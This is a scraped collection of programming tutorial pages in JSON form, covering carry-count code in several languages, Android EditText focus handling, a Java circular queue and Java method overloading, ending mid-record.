args){ String a = "9555", b = "555"; int count = count_carry(a, b); if (count == 0) System.out.println("0\n"); else if (count == 1) System.out.println("1\n"); else System.out.println(count);}} // This code is contributed by Shashank # Python3 implementation of # above approach # Function to count the number # of carry operations def count_carry(a, b): # Initialize the value of # carry to 0 carry = 0; # Counts the number of carry # operations count = 0; # Initialize len_a and len_b # with the sizes of strings len_a = len(a); len_b = len(b); while (len_a != 0 or len_b != 0): # Assigning the ascii value # of the character x = 0; y = 0; if (len_a > 0): x = int(a[len_a - 1]) + int('0'); len_a -= 1; if (len_b > 0): y = int(b[len_b - 1]) + int('0'); len_b -= 1; # Add both numbers/digits sum = x + y + carry; # If sum > 0, increment count # and set carry to 1 if (sum >= 10): carry = 1; count += 1; # Else, set carry to 0 else: carry = 0; return count; # Driver code a = "9555";b = "555"; count = count_carry(a, b); if (count == 0): print("0"); elif (count == 1): print("1"); else: print(count); # This code is contributed by mits // C# implementation of // above approachusing System; class GFG { // Function to count the number // of carry operationsstatic int count_carry(string a, string b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.Length, len_b = b.Length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void Main (){ string a = "9555", b = "555"; int count = count_carry(a, b); if (count == 0) Console.Write("0\n"); else if (count == 1) Console.Write("1\n"); else Console.Write(count);}} // This code is contributed// by ChitraNayal <?php// PHP implementation of above approach // Function to count the number // of carry operations function count_carry($a, $b) { // Initialize the value of // carry to 0 $carry = 0; // Counts the number of carry // operations $count = 0; // Initialize len_a and len_b // with the sizes of strings $len_a = strlen($a); $len_b = strlen($b); while ($len_a != 0 || $len_b != 0) { // Assigning the ascii value // of the character $x = 0; $y = 0; if ($len_a > 0) { $x = $a[$len_a - 1] - '0'; $len_a--; } if ($len_b > 0) { $y = $b[$len_b - 1] - '0'; $len_b--; } // Add both numbers/digits $sum = $x + $y + $carry; // If sum > 0, increment count // and set carry to 1 if ($sum >= 10) { $carry = 1; $count++; } // Else, set carry to 0 else $carry = 0; } return $count; } // Driver code $a = "9555";$b = "555"; $count = count_carry($a, $b); if ($count == 0) echo "0\n"; else if ($count == 1) echo "1\n"; else echo $count , "\n"; // This code is contributed by jit_t?> <script> // Javascript implementation of above approach // Function to count the number // of carry operations function count_carry(a, b) { // Initialize the value // of carry to 0 let carry = 0; // Counts the number of // carry operations let count = 0; // Initialize len_a and len_b // with the sizes of strings let len_a = a.length, len_b = b.length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character let x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits let sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count; } let a = "9555", b = "555"; let count = count_carry(a, b); if (count == 0) document.write("0" + "</br>"); else if (count == 1) document.write("1" + "</br>"); else document.write(count); </script> 4 Shashank12 ukasp jit_t Mithun Kumar suresh07 surinderdawra388 ankitsahaisaxena234 chhabradhanvi Numbers Competitive Programming Mathematical Strings Strings Mathematical Numbers Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Bits manipulation (Important tactics) Modulo 10^9+7 (1000000007) Prefix Sum Array - Implementation and Applications in Competitive Programming Formatted output in Java Breadth First Traversal ( BFS ) on a 2D array Program for Fibonacci numbers Write a program to print all permutations of a given string C++ Data Types Set in C++ Standard Template Library (STL) Coin Change | DP-7
[ { "code": null, "e": 25476, "s": 25448, "text": "\n29 Oct, 2021" }, { "code": null, "e": 25593, "s": 25476, "text": "Given two numbers, the task is to find the number of carry operations required when two numbers are added as below. " }, { "code": null, "e": 25618, "s": 25593, "text": "1234 + 5678 ——– 6912 ——–" }, { "code": null, "e": 25630, "s": 25618, "text": "Examples: " }, { "code": null, "e": 25779, "s": 25630, "text": "Input: n = 1234, k = 5678\nOutput: 2\n\n4+8 = 2 and carry 1\ncarry+3+7 = carry 1\ncarry+2+6 = 9, carry 0\ncarry+1+5 = 6\n\nInput: n = 555, k = 555\nOutput: 3" }, { "code": null, "e": 25833, "s": 25781, "text": "Approach: Store the values of n and k in strings. " }, { "code": null, "e": 26304, "s": 25833, "text": "Initialize the carry variable and count variable to 0.Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other).Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not.If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0.At last, print your answer which is count." }, { "code": null, "e": 26359, "s": 26304, "text": "Initialize the carry variable and count variable to 0." }, { "code": null, "e": 26485, "s": 26359, "text": "Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other)." }, { "code": null, "e": 26610, "s": 26485, "text": "Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not." }, { "code": null, "e": 26736, "s": 26610, "text": "If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0." }, { "code": null, "e": 26779, "s": 26736, "text": "At last, print your answer which is count." }, { "code": null, "e": 26828, "s": 26779, "text": "Below is the implementation of above approach: " }, { "code": null, "e": 26832, "s": 26828, "text": "C++" }, { "code": null, "e": 26837, "s": 26832, "text": "Java" }, { "code": null, "e": 26845, "s": 26837, "text": "Python3" }, { "code": null, "e": 26848, "s": 26845, "text": "C#" }, { "code": null, "e": 26852, "s": 26848, "text": "PHP" }, { "code": null, "e": 26863, "s": 26852, "text": "Javascript" }, { "code": "// C++ implementation of above approach#include <bits/stdc++.h>using namespace std; // Function to count the number of// carry operationsint count_carry(string a, string b){ // Initialize the value of carry to 0 int carry = 0; // Counts the number of carry operations int count = 0; // Initialize len_a and len_b with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codeint main(){ string a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) cout << \"0\\n\"; else if (count == 1) cout << \"1\\n\"; else cout << count << \"\\n\"; return 0;}", "e": 28108, "s": 26863, "text": null }, { "code": "// Java implementation of // above approachimport java.io.*; class GFG { // Function to count the number // of carry operationsstatic int count_carry(String a, String b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a.charAt(len_a - 1) - '0'; len_a--; } if (len_b > 0) { y = b.charAt(len_b - 1) - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void main (String[] args){ String a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) System.out.println(\"0\\n\"); else if (count == 1) System.out.println(\"1\\n\"); else System.out.println(count);}} // This code is contributed by Shashank", "e": 29516, "s": 28108, "text": null }, { "code": "# Python3 implementation of # above approach # Function to count the number # of carry operations def count_carry(a, b): # Initialize the value of # carry to 0 carry = 0; # Counts the number of carry # operations count = 0; # Initialize len_a and len_b # with the sizes of strings len_a = len(a); len_b = len(b); while (len_a != 0 or len_b != 0): # Assigning the ascii value # of the character x = 0; y = 0; if (len_a > 0): x = int(a[len_a - 1]) + int('0'); len_a -= 1; if (len_b > 0): y = int(b[len_b - 1]) + int('0'); len_b -= 1; # Add both numbers/digits sum = x + y + carry; # If sum > 0, increment count # and set carry to 1 if (sum >= 10): carry = 1; count += 1; # Else, set carry to 0 else: carry = 0; return count; # Driver code a = \"9555\";b = \"555\"; count = count_carry(a, b); if (count == 0): print(\"0\"); elif (count == 1): print(\"1\"); else: print(count); # This code is contributed by mits", "e": 30690, "s": 29516, "text": null }, { "code": "// C# implementation of // above approachusing System; class GFG { // Function to count the number // of carry operationsstatic int count_carry(string a, string b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.Length, len_b = b.Length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void Main (){ string a = \"9555\", b = \"555\"; int count = count_carry(a, b); if (count == 0) Console.Write(\"0\\n\"); else if (count == 1) Console.Write(\"1\\n\"); else Console.Write(count);}} // This code is contributed// by ChitraNayal", "e": 32052, "s": 30690, "text": null }, { "code": "<?php// PHP implementation of above approach // Function to count the number // of carry operations function count_carry($a, $b) { // Initialize the value of // carry to 0 $carry = 0; // Counts the number of carry // operations $count = 0; // Initialize len_a and len_b // with the sizes of strings $len_a = strlen($a); $len_b = strlen($b); while ($len_a != 0 || $len_b != 0) { // Assigning the ascii value // of the character $x = 0; $y = 0; if ($len_a > 0) { $x = $a[$len_a - 1] - '0'; $len_a--; } if ($len_b > 0) { $y = $b[$len_b - 1] - '0'; $len_b--; } // Add both numbers/digits $sum = $x + $y + $carry; // If sum > 0, increment count // and set carry to 1 if ($sum >= 10) { $carry = 1; $count++; } // Else, set carry to 0 else $carry = 0; } return $count; } // Driver code $a = \"9555\";$b = \"555\"; $count = count_carry($a, $b); if ($count == 0) echo \"0\\n\"; else if ($count == 1) echo \"1\\n\"; else echo $count , \"\\n\"; // This code is contributed by jit_t?>", "e": 33332, "s": 32052, "text": null }, { "code": "<script> // Javascript implementation of above approach // Function to count the number // of carry operations function count_carry(a, b) { // Initialize the value // of carry to 0 let carry = 0; // Counts the number of // carry operations let count = 0; // Initialize len_a and len_b // with the sizes of strings let len_a = a.length, len_b = b.length; while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character let x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits let sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count; } let a = \"9555\", b = \"555\"; let count = count_carry(a, b); if (count == 0) document.write(\"0\" + \"</br>\"); else if (count == 1) document.write(\"1\" + \"</br>\"); else document.write(count); </script>", "e": 34774, "s": 33332, "text": null }, { "code": null, "e": 34776, "s": 34774, "text": "4" }, { "code": null, "e": 34789, "s": 34778, "text": "Shashank12" }, { "code": null, "e": 34795, "s": 34789, "text": "ukasp" }, { "code": null, "e": 34801, "s": 34795, "text": "jit_t" }, { "code": null, "e": 34814, "s": 34801, "text": "Mithun Kumar" }, { "code": null, "e": 34823, "s": 34814, "text": "suresh07" }, { "code": null, "e": 34840, "s": 34823, "text": "surinderdawra388" }, { "code": null, "e": 34860, "s": 34840, "text": "ankitsahaisaxena234" }, { "code": null, "e": 34874, "s": 34860, "text": "chhabradhanvi" }, { "code": null, "e": 34882, "s": 34874, "text": "Numbers" }, { "code": null, "e": 34906, "s": 34882, "text": "Competitive Programming" }, { "code": null, "e": 34919, "s": 34906, "text": "Mathematical" }, { "code": null, "e": 34927, "s": 34919, "text": "Strings" }, { "code": null, "e": 34935, "s": 34927, "text": "Strings" }, { "code": null, "e": 34948, "s": 34935, "text": "Mathematical" }, { "code": null, "e": 34956, "s": 34948, "text": "Numbers" }, { "code": null, "e": 35054, "s": 34956, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 35092, "s": 35054, "text": "Bits manipulation (Important tactics)" }, { "code": null, "e": 35119, "s": 35092, "text": "Modulo 10^9+7 (1000000007)" }, { "code": null, "e": 35197, "s": 35119, "text": "Prefix Sum Array - Implementation and Applications in Competitive Programming" }, { "code": null, "e": 35222, "s": 35197, "text": "Formatted output in Java" }, { "code": null, "e": 35268, "s": 35222, "text": "Breadth First Traversal ( BFS ) on a 2D array" }, { "code": null, "e": 35298, "s": 35268, "text": "Program for Fibonacci numbers" }, { "code": null, "e": 35358, "s": 35298, "text": "Write a program to print all permutations of a given string" }, { "code": null, "e": 35373, "s": 35358, "text": "C++ Data Types" }, { "code": null, "e": 35416, "s": 35373, "text": "Set in C++ Standard Template Library (STL)" } ]
How can I know when an EditText loses focus in Android?
This example demonstrates how can I know when an EditText loses focus. Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project. Step 2 − Add the following code to res/layout/activity_main.xml. <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/parent" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" tools:context=".MainActivity" android:gravity="center" android:orientation="vertical"> <EditText android:id="@+id/editText" android:hint="Loosing focus example" android:layout_width="wrap_content" android:layout_height="wrap_content" > </EditText> <Button android:id="@+id/removeFocus" android:text="Remove Focus" android:layout_width="wrap_content" android:layout_height="wrap_content" /> <Button android:id="@+id/gainFocus" android:text="Gain Focus" android:layout_width="wrap_content" android:layout_height="wrap_content" /> </LinearLayout> In the above code, we have taken one edit text and two buttons. remove focus button going to remove the focus of edit text and other button going to gain focus of edit text. Step 3 − Add the following code to src/MainActivity.java package com.example.andy.myapplication; import android.os.Build; import android.os.Bundle; import android.support.annotation.RequiresApi; import android.support.v7.app.AppCompatActivity; import android.view.View; import android.widget.Button; import android.widget.EditText; import android.widget.Toast; public class MainActivity extends AppCompatActivity { int view = R.layout.activity_main; EditText editText; Button removeFocus, gainFocus; @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN) @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(view); editText = findViewById(R.id.editText); removeFocus = findViewById(R.id.removeFocus); gainFocus = findViewById(R.id.gainFocus); gainFocus.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { editText.setFocusableInTouchMode(true); editText.setFocusable(true); } }); removeFocus.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { editText.setFocusableInTouchMode(false); editText.setFocusable(false); } }); editText.setOnFocusChangeListener(new View.OnFocusChangeListener() { @Override public void onFocusChange(View v, boolean hasFocus) { if (!hasFocus) { Toast.makeText(MainActivity.this, "focus loosed", Toast.LENGTH_LONG).show(); } else { Toast.makeText(MainActivity.this, "focused", Toast.LENGTH_LONG).show(); } } }); } } In the above button, we have removed focus as shown below - editText.setFocusableInTouchMode(false); editText.setFocusable(false); To gain focus use the following code - editText.setFocusableInTouchMode(true); editText.setFocusable(true); To find the status of focus in edit text as shown below - editText.setOnFocusChangeListener(new View.OnFocusChangeListener() { @Override public void onFocusChange(View v, boolean hasFocus) { if (!hasFocus) { Toast.makeText(MainActivity.this, "focus loosed", Toast.LENGTH_LONG).show(); } else { Toast.makeText(MainActivity.this, "focused", Toast.LENGTH_LONG).show(); } } }); Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen − In the above result, we have clicked on remove focus. it is showing a message as focus loosed(check cursor ). now click on gain focus, it will gain focus as shown below - Click here to download the project code
[ { "code": null, "e": 1133, "s": 1062, "text": "This example demonstrates how can I know when an EditText loses focus." }, { "code": null, "e": 1262, "s": 1133, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1327, "s": 1262, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 2209, "s": 1327, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\nandroid:id=\"@+id/parent\"\nxmlns:tools=\"http://schemas.android.com/tools\"\nandroid:layout_width=\"match_parent\"\nandroid:layout_height=\"match_parent\"\ntools:context=\".MainActivity\"\nandroid:gravity=\"center\"\nandroid:orientation=\"vertical\">\n <EditText\n android:id=\"@+id/editText\"\n android:hint=\"Loosing focus example\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" >\n</EditText>\n <Button\n android:id=\"@+id/removeFocus\"\n android:text=\"Remove Focus\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" />\n <Button\n android:id=\"@+id/gainFocus\"\n android:text=\"Gain Focus\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\" />\n</LinearLayout>" }, { "code": null, "e": 2383, "s": 2209, "text": "In the above code, we have taken one edit text and two buttons. remove focus button going to remove the focus of edit text and other button going to gain focus of edit text." }, { "code": null, "e": 2440, "s": 2383, "text": "Step 3 − Add the following code to src/MainActivity.java" }, { "code": null, "e": 4135, "s": 2440, "text": "package com.example.andy.myapplication;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.support.annotation.RequiresApi;\nimport android.support.v7.app.AppCompatActivity;\nimport android.view.View;\nimport android.widget.Button;\nimport android.widget.EditText;\nimport android.widget.Toast;\npublic class MainActivity extends AppCompatActivity {\n int view = R.layout.activity_main;\n EditText editText;\n Button removeFocus, gainFocus;\n @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN)\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(view);\n editText = findViewById(R.id.editText);\n removeFocus = findViewById(R.id.removeFocus);\n gainFocus = findViewById(R.id.gainFocus);\n gainFocus.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n editText.setFocusableInTouchMode(true);\n editText.setFocusable(true);\n }\n });\n removeFocus.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n editText.setFocusableInTouchMode(false);\n editText.setFocusable(false);\n }\n });\n editText.setOnFocusChangeListener(new View.OnFocusChangeListener() {\n @Override\n public void onFocusChange(View v, boolean hasFocus) {\n if (!hasFocus) {\n Toast.makeText(MainActivity.this, \"focus loosed\", Toast.LENGTH_LONG).show();\n } else {\n Toast.makeText(MainActivity.this, \"focused\", Toast.LENGTH_LONG).show();\n }\n }\n });\n }\n}" }, { "code": null, "e": 4195, "s": 4135, "text": "In the above button, we have removed focus as shown below -" }, { "code": null, "e": 4266, "s": 4195, "text": "editText.setFocusableInTouchMode(false);\neditText.setFocusable(false);" }, { "code": null, "e": 4305, "s": 4266, "text": "To gain focus use the following code -" }, { "code": null, "e": 4374, "s": 4305, "text": "editText.setFocusableInTouchMode(true);\neditText.setFocusable(true);" }, { "code": null, "e": 4432, "s": 4374, "text": "To find the status of focus in edit text as shown below -" }, { "code": null, "e": 4793, "s": 4432, "text": "editText.setOnFocusChangeListener(new View.OnFocusChangeListener() {\n @Override\n public void onFocusChange(View v, boolean hasFocus) {\n if (!hasFocus) {\n Toast.makeText(MainActivity.this, \"focus loosed\", Toast.LENGTH_LONG).show();\n } else {\n Toast.makeText(MainActivity.this, \"focused\", Toast.LENGTH_LONG).show();\n }\n }\n});" }, { "code": null, "e": 5141, "s": 4793, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen −" }, { "code": null, "e": 5312, "s": 5141, "text": "In the above result, we have clicked on remove focus. it is showing a message as focus loosed(check cursor ). now click on gain focus, it will gain focus as shown below -" }, { "code": null, "e": 5352, "s": 5312, "text": "Click here to download the project code" } ]
DSA using Java - Queue
Queue is kind of data structure similar to stack with primary difference that the first item inserted is the first item to be removed (FIFO - First In First Out) where stack is based on LIFO, Last In First Out principal. insert / enqueue − add an item to the rear of the queue. insert / enqueue − add an item to the rear of the queue. remove / dequeue − remove an item from the front of the queue. remove / dequeue − remove an item from the front of the queue. We're going to implement Queue using array in this article. There is few more operations supported by queue which are following. Peek − get the element at front of the queue. Peek − get the element at front of the queue. isFull − check if queue is full. isFull − check if queue is full. isEmpty − check if queue is empty. isEmpty − check if queue is empty. Whenever an element is inserted into queue, queue increments the rear index for later use and stores that element at the rear end of the storage. If rear end reaches to the last index and it is wrapped to the bottom location. Such an arrangement is called wrap around and such queue is circular queue. This method is also termed as enqueue operation. public void insert(int data){ if(!isFull()){ if(rear == MAX-1){ rear = -1; } intArray[++rear] = data; itemCount++; } } Whenever an element is to be removed from queue, queue get the element using front index and increments the front index. As a wrap around arrangement, if front index is more than array's max index, it is set to 0. public int remove(){ int data = intArray[front++]; if(front == MAX){ front = 0; } itemCount--; return data; } Queue.java package com.tutorialspoint.datastructure; public class Queue { private final int MAX; private int[] intArray; private int front; private int rear; private int itemCount; public Queue(int size){ MAX = size; intArray = new int[MAX]; front = 0; rear = -1; itemCount = 0; } public void insert(int data){ if(!isFull()){ if(rear == MAX-1){ rear = -1; } intArray[++rear] = data; itemCount++; } } public int remove(){ int data = intArray[front++]; if(front == MAX){ front = 0; } itemCount--; return data; } public int peek(){ return intArray[front]; } public boolean isEmpty(){ return itemCount == 0; } public boolean isFull(){ return itemCount == MAX; } public int size(){ return itemCount; } } QueueDemo.java package com.tutorialspoint.datastructure; public class QueueDemo { public static void main(String[] args){ Queue queue = new Queue(6); //insert 5 items queue.insert(3); queue.insert(5); queue.insert(9); queue.insert(1); queue.insert(12); // front : 0 // rear : 4 // ------------------ // index : 0 1 2 3 4 // ------------------ // queue : 3 5 9 1 12 queue.insert(15); // front : 0 // rear : 5 // --------------------- // index : 0 1 2 3 4 5 // --------------------- // queue : 3 5 9 1 12 15 if(queue.isFull()){ System.out.println("Queue is full!"); } //remove one item int num = queue.remove(); System.out.println("Element removed: "+num); // front : 1 // rear : 5 // ------------------- // index : 1 2 3 4 5 // ------------------- // queue : 5 9 1 12 15 //insert more items queue.insert(16); // front : 1 // rear : -1 // ---------------------- // index : 0 1 2 3 4 5 // ---------------------- // queue : 16 5 9 1 12 15 //As queue is full, elements will not be inserted. queue.insert(17); queue.insert(18); // ---------------------- // index : 0 1 2 3 4 5 // ---------------------- // queue : 16 5 9 1 12 15 System.out.println("Element at front: "+queue.peek()); System.out.println("----------------------"); System.out.println("index : 5 4 3 2 1 0"); System.out.println("----------------------"); System.out.print("Queue: "); while(!queue.isEmpty()){ int n = queue.remove(); System.out.print(n +" "); } } } If we compile and run the above program then it would produce following result − Queue is full! Element removed: 3 Element at front: 5 ---------------------- index : 5 4 3 2 1 0 ---------------------- Queue: 5 9 1 12 15 16 Print Add Notes Bookmark this page
[ { "code": null, "e": 2390, "s": 2168, "text": "Queue is kind of data structure similar to stack with primary difference that the first item inserted is the first item to be removed (FIFO - First In First Out) where stack is based on LIFO, Last In First Out principal." }, { "code": null, "e": 2447, "s": 2390, "text": "insert / enqueue − add an item to the rear of the queue." }, { "code": null, "e": 2504, "s": 2447, "text": "insert / enqueue − add an item to the rear of the queue." }, { "code": null, "e": 2567, "s": 2504, "text": "remove / dequeue − remove an item from the front of the queue." }, { "code": null, "e": 2630, "s": 2567, "text": "remove / dequeue − remove an item from the front of the queue." }, { "code": null, "e": 2759, "s": 2630, "text": "We're going to implement Queue using array in this article. There is few more operations supported by queue which are following." }, { "code": null, "e": 2805, "s": 2759, "text": "Peek − get the element at front of the queue." }, { "code": null, "e": 2851, "s": 2805, "text": "Peek − get the element at front of the queue." }, { "code": null, "e": 2884, "s": 2851, "text": "isFull − check if queue is full." }, { "code": null, "e": 2917, "s": 2884, "text": "isFull − check if queue is full." }, { "code": null, "e": 2952, "s": 2917, "text": "isEmpty − check if queue is empty." }, { "code": null, "e": 2987, "s": 2952, "text": "isEmpty − check if queue is empty." }, { "code": null, "e": 3338, "s": 2987, "text": "Whenever an element is inserted into queue, queue increments the rear index for later use and stores that element at the rear end of the storage. If rear end reaches to the last index and it is wrapped to the bottom location. Such an arrangement is called wrap around and such queue is circular queue. This method is also termed as enqueue operation." }, { "code": null, "e": 3522, "s": 3338, "text": "public void insert(int data){\n if(!isFull()){\n if(rear == MAX-1){\n rear = -1; \n } \n \n intArray[++rear] = data;\n itemCount++;\n }\n}" }, { "code": null, "e": 3737, "s": 3522, "text": "Whenever an element is to be removed from queue, queue get the element using front index and increments the front index. As a wrap around arrangement, if front index is more than array's max index, it is set to 0. " }, { "code": null, "e": 3875, "s": 3737, "text": " \t \t\npublic int remove(){\n int data = intArray[front++];\n if(front == MAX){\n front = 0;\n }\n itemCount--;\n return data; \n}" }, { "code": null, "e": 3886, "s": 3875, "text": "Queue.java" }, { "code": null, "e": 4823, "s": 3886, "text": "package com.tutorialspoint.datastructure;\n\npublic class Queue {\n \n private final int MAX;\n private int[] intArray;\n private int front;\n private int rear;\n private int itemCount;\n\n public Queue(int size){\n MAX = size;\n intArray = new int[MAX];\n front = 0;\n rear = -1;\n itemCount = 0;\n }\n\n public void insert(int data){\n if(!isFull()){\n if(rear == MAX-1){\n rear = -1; \n } \n\n intArray[++rear] = data;\n itemCount++;\n }\n }\n\n public int remove(){\n int data = intArray[front++];\n if(front == MAX){\n front = 0;\n }\n itemCount--;\n return data; \n }\n\n public int peek(){\n return intArray[front];\n }\n\n public boolean isEmpty(){\n return itemCount == 0;\n }\n\n public boolean isFull(){\n return itemCount == MAX;\n }\n\n public int size(){\n return itemCount;\n } \n}" }, { "code": null, "e": 4838, "s": 4823, "text": "QueueDemo.java" }, { "code": null, "e": 6647, "s": 4838, "text": "package com.tutorialspoint.datastructure;\n\npublic class QueueDemo {\n public static void main(String[] args){\n Queue queue = new Queue(6);\n \n //insert 5 items\n queue.insert(3);\n queue.insert(5);\n queue.insert(9);\n queue.insert(1);\n queue.insert(12);\n\n // front : 0\n // rear : 4\n // ------------------\n // index : 0 1 2 3 4 \n // ------------------\n // queue : 3 5 9 1 12\n\n queue.insert(15);\n\n // front : 0\n // rear : 5\n // ---------------------\n // index : 0 1 2 3 4 5 \n // ---------------------\n // queue : 3 5 9 1 12 15\n\n if(queue.isFull()){\n System.out.println(\"Queue is full!\"); \n }\n\n\n //remove one item\n int num = queue.remove();\n System.out.println(\"Element removed: \"+num);\n // front : 1\n // rear : 5\n // -------------------\n // index : 1 2 3 4 5\n // -------------------\n // queue : 5 9 1 12 15\n\n //insert more items\n queue.insert(16);\n\n // front : 1\n // rear : -1\n // ----------------------\n // index : 0 1 2 3 4 5\n // ----------------------\n // queue : 16 5 9 1 12 15\n\n //As queue is full, elements will not be inserted.\n queue.insert(17);\n queue.insert(18);\n \n // ----------------------\n // index : 0 1 2 3 4 5\n // ----------------------\n // queue : 16 5 9 1 12 15\n System.out.println(\"Element at front: \"+queue.peek());\n\n System.out.println(\"----------------------\");\n System.out.println(\"index : 5 4 3 2 1 0\");\n System.out.println(\"----------------------\");\n System.out.print(\"Queue: \");\n while(!queue.isEmpty()){\n int n = queue.remove(); \n System.out.print(n +\" \");\n }\n }\n}" }, { "code": null, "e": 6728, "s": 6647, "text": "If we compile and run the above program then it would produce following result −" }, { "code": null, "e": 6874, "s": 6728, "text": "Queue is full!\nElement removed: 3\nElement at front: 5\n----------------------\nindex : 5 4 3 2 1 0\n----------------------\nQueue: 5 9 1 12 15 16\n" }, { "code": null, "e": 6881, "s": 6874, "text": " Print" }, { "code": null, "e": 6892, "s": 6881, "text": " Add Notes" } ]
Can we overload a method based on different return type but same argument type and number, in java?
When a class has two or more methods by the same name but different parameters, at the time of calling based on the parameters passed respective method is called (or respective method body will be bonded with the calling line dynamically). This mechanism is known as method overloading. class Test{ public int division(int a, int b){ int result = a/b; return result; } public double division (float a, float b){ double result = a/b; return result; } } No, you cannot overload a method based on different return type but same argument type and number in java. In overloading it is must that the both methods have − same name. different parameters (different type or, different number or both). The return type doesn’t matter. If they don’t have different parameters, they both are still considered as same method and a compile time error will be generated. In the following example we are trying to overload two methods: They have same name (division) same parameters (two integers). class Test{ public int division(int a, int b){ int result = a/b; return result; } public double division (int a, int b){ double result = a/b; return result; } } If you try to compile the above program, since the parameters are not different Java compiler considers them as same methods and generates the following error. OverloadingExample.java:6: error: method division(int,int) is already defined in class Test public static double division (int a, int b){ ^ 1 error
[ { "code": null, "e": 1349, "s": 1062, "text": "When a class has two or more methods by the same name but different parameters, at the time of calling based on the parameters passed respective method is called (or respective method body will be bonded with the calling line dynamically). This mechanism is known as method overloading." }, { "code": null, "e": 1550, "s": 1349, "text": "class Test{\n public int division(int a, int b){\n int result = a/b;\n return result;\n }\n public double division (float a, float b){\n double result = a/b;\n return result;\n }\n}" }, { "code": null, "e": 1657, "s": 1550, "text": "No, you cannot overload a method based on different return type but same argument type and number in java." }, { "code": null, "e": 1712, "s": 1657, "text": "In overloading it is must that the both methods have −" }, { "code": null, "e": 1723, "s": 1712, "text": "same name." }, { "code": null, "e": 1791, "s": 1723, "text": "different parameters (different type or, different number or both)." }, { "code": null, "e": 1954, "s": 1791, "text": "The return type doesn’t matter. If they don’t have different parameters, they both are still considered as same method and a compile time error will be generated." }, { "code": null, "e": 2081, "s": 1954, "text": "In the following example we are trying to overload two methods: They have same name (division) same 